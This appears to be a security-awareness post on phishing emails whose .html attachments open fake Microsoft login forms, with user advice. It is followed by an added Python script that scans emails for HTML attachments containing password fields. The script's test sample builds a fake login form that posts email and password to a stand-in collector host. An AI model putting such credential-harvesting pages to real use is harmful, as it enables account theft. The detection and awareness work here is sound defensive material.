Avoid this scam email

Here is one of the latest scam emails, which we have seen a lot of lately. It can arrive with a subject containing “Invoice” or “Voicemail”, or another title that may seem benign or common in your usual email activity. One big giveaway is that the attachment on this email ends with .html (highlighted). It also comes from another legitimate organisation’s domain (highlighted), which indicates that their email server has been hacked and used to send this email to you and other target organisations.

When you attempt to open the attachment, you are taken to a login screen. It may look similar to the Microsoft login page we are used to, but it is not. This form sends your email address and password to the attacker.

This login form will send your email address and password to the attacker.

Following a couple of simple rules can help you avoid this scam and others.

  • Never log in to a form that is presented after clicking a link or attachment. Even if you are certain it’s legitimate, log in at office.com or the target service first, not via the link.

  • .html attachments will 99.99% of the time be a scam attachment. If unsure, first contact the person who sent the link using their listed, known phone number or email address, not a phone number given in the email and not by replying to the email.

  • Turn on two-factor authentication for yourself and for all of your organisation’s email addresses. This will serve as your extra layer of defence if someone accidentally falls victim.

  • Discuss it with others! The best way to avoid these scams in your organisation is to make others aware.

  • Implement Secure Defaults for your Office 365, Google or other email and office collaboration systems. Follow best security practices for your organisation’s systems; we can help you more with this.
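
For mail administrators, the .html giveaway described above can also be checked automatically. The following is an added example, not part of the original post: it parses a raw email and flags any HTML attachment that contains a password field. The function names, the "quarantine"/"review" verdicts and the sample message (addresses, domain, filenames) are constructed for illustration.

```python
import email
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser

class FormFinder(HTMLParser):
    """Records form targets and whether a password field is present."""
    def __init__(self):
        super().__init__()
        self.actions, self.has_password = [], False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True

def scan_message(raw_bytes):
    """Return one finding per HTML attachment in a raw email message."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if not (name.lower().endswith((".html", ".htm"))
                or part.get_content_type() == "text/html"):
            continue
        body = part.get_content()
        if isinstance(body, bytes):  # HTML sent with a non-text content type
            body = body.decode("utf-8", errors="replace")
        finder = FormFinder()
        finder.feed(body)
        findings.append({
            "filename": name,
            "form_actions": finder.actions,
            "verdict": "quarantine" if finder.has_password else "review",
        })
    return findings

def build_sample():
    """Constructed sample: an 'Invoice' mail with a fake login page attached."""
    m = EmailMessage()
    m["From"], m["To"] = "accounts@sender.example", "user@recipient.example"
    m["Subject"] = "Invoice"
    m.set_content("Please see the attached invoice.")
    page = ('<form action="https://collector.example/post" method="post">'
            '<input type="email" name="u"><input type="password" name="p"></form>')
    m.add_attachment(page, subtype="html", filename="Invoice_1042.html")
    m.add_attachment(b"%PDF-1.4", maintype="application", subtype="pdf", filename="terms.pdf")
    return m.as_bytes()
```

Calling `scan_message(build_sample())` reports only the HTML attachment, with the address its form would submit to, and ignores the PDF.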
